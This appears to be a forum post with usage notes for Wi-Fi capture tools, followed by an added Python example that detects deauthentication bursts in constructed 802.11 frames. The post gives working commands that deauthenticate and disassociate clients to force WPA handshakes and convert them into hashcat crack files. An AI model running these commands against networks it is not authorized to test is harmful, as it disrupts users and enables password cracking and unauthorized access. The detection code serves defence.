06-26-2017, 09:40 PM
capture:
sudo wlandump-ng -i wlp0s26u1u2 -o test.cap -c 1 -t 3 -d 100 -D 10 -m 512 -b -r -s 20
Options:
-i -> the name of your wlan device - do not use virtual devices like mon0, mon1, monx
-o -> capture to this cap
-c -> start on channel 1
-t -> stay 3 seconds on this channel
-d -> deauthenticate clients every 100 received management-packets
(do not use values below this, because this will make the AP change the anonce lease time - important for hashcat nonce-corr)
-D -> disassociate clients every 10 received (NULL-, Powersave-, M4- packets)
(do not use values below this, because this will make the AP change the anonce lease time - important for hashcat nonce-corr)
-m -> size of internal ringbuffer (if more are received, the oldest will be deleted)
-b -> activate beaconing on last ten probed clients
-r -> reset counter if channel 1 reached
-s -> show 20 additional status lines
wlanresponse is the "angry" brother of wlandump-ng!
sudo wlanresponse -b -t 3 -i wlp0s26u1u2 -o test.cap
-i -> the name of your wlan device - do not use virtual devices like mon0, mon1, monx
-o -> capture to this cap
-b -> activate beaconing on last ten probed clients
-t -> stay 3 seconds on this channel
fewer options, no status display, but extremely fast!
convert:
wlancap2hcx -x -e wordlist -o test.hccapx *.cap
Options:
-x -> match exact mac_ap and mac_sta
-e -> also extract found passwords and network names from wlan traffic (will be appended)
-o -> your hccapx file (new hashes will be appended)
*.cap -> do this from all cap files (or *.pcap from all pcap files or *.pcapng from all pcapng files)
if RADIUS authentications are inside your cap:
-m -> strip these hashes to a file - iSCSI CHAP authentication, MD5(CHAP): use hashcat -m 4800
-n -> strip these hashes to a file - PPP-CHAP and NetNTLMv1 authentication: use hashcat -m 5500
-u -> also extract user names, domain names or identities
Take a look at the help for more options
I will not give tutorials on how to set a device to monitor mode or how to disable systemd services that take access to wlan devices - that's basic LINUX knowledge!
Cheers
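The post's -d and -D options force handshakes by sending deauthentication and disassociation frames, so the defender-side counterpart is a monitor that spots bursts of those frames. The following Python is an added example, not code from the post or from hcxtools: it parses the fixed header of raw 802.11 management frames, counts deauth/disassoc frames per transmitter/BSSID pair and flags pairs above a threshold. All frame bytes, MAC addresses and the threshold are constructed for the example; real input would be frames from a monitor-mode capture.

```python
import struct
from collections import Counter

# 802.11 management subtypes (type 0) used to kick clients off an AP
DISASSOC = 0xA
DEAUTH = 0xC

def parse_mgmt(frame: bytes):
    """Return (subtype, transmitter, bssid, reason) for a management frame, else None.

    Layout: FC(2) Duration(2) Addr1(6) Addr2(6) Addr3(6) SeqCtl(2) Body...
    For deauth/disassoc the body starts with a 2-byte little-endian reason code.
    """
    if len(frame) < 26:
        return None
    fc0 = frame[0]
    ftype = (fc0 >> 2) & 0x3      # bits 2-3: frame type, 0 = management
    subtype = fc0 >> 4            # bits 4-7: subtype
    if ftype != 0:
        return None
    transmitter = frame[10:16].hex(":")   # Addr2 = SA of the frame
    bssid = frame[16:22].hex(":")         # Addr3 = BSSID for management frames
    reason = struct.unpack_from("<H", frame, 24)[0] if subtype in (DISASSOC, DEAUTH) else None
    return subtype, transmitter, bssid, reason

def build_frame(subtype: int, sa: bytes, bssid: bytes, da: bytes = b"\xff" * 6, reason: int = 7) -> bytes:
    """Constructed sample management frame (not a real capture); reason 7 = class 3 frame from non-associated STA."""
    fc = bytes([subtype << 4, 0x00])
    return fc + b"\x00\x00" + da + sa + bssid + b"\x00\x00" + struct.pack("<H", reason)

def flag_deauth_bursts(frames, threshold: int = 10) -> dict:
    """Count deauth/disassoc frames per (transmitter, bssid); return pairs at or above threshold."""
    counts = Counter()
    for f in frames:
        parsed = parse_mgmt(f)
        if parsed and parsed[0] in (DISASSOC, DEAUTH):
            counts[(parsed[1], parsed[2])] += 1
    return {pair: n for pair, n in counts.items() if n >= threshold}

def sample_frames() -> list:
    """Constructed traffic: 17 kick-off frames from one BSSID, plus benign noise."""
    ap_a = bytes.fromhex("001122334455")   # constructed BSSID under a deauth burst
    ap_b = bytes.fromhex("66778899aabb")   # constructed BSSID with a single legitimate deauth
    frames = [build_frame(DEAUTH, ap_a, ap_a) for _ in range(15)]
    frames += [build_frame(DISASSOC, ap_a, ap_a) for _ in range(2)]
    frames.append(build_frame(0x8, ap_a, ap_a))          # a beacon, must be ignored
    frames.append(build_frame(DEAUTH, ap_b, ap_b, reason=3))
    return frames
```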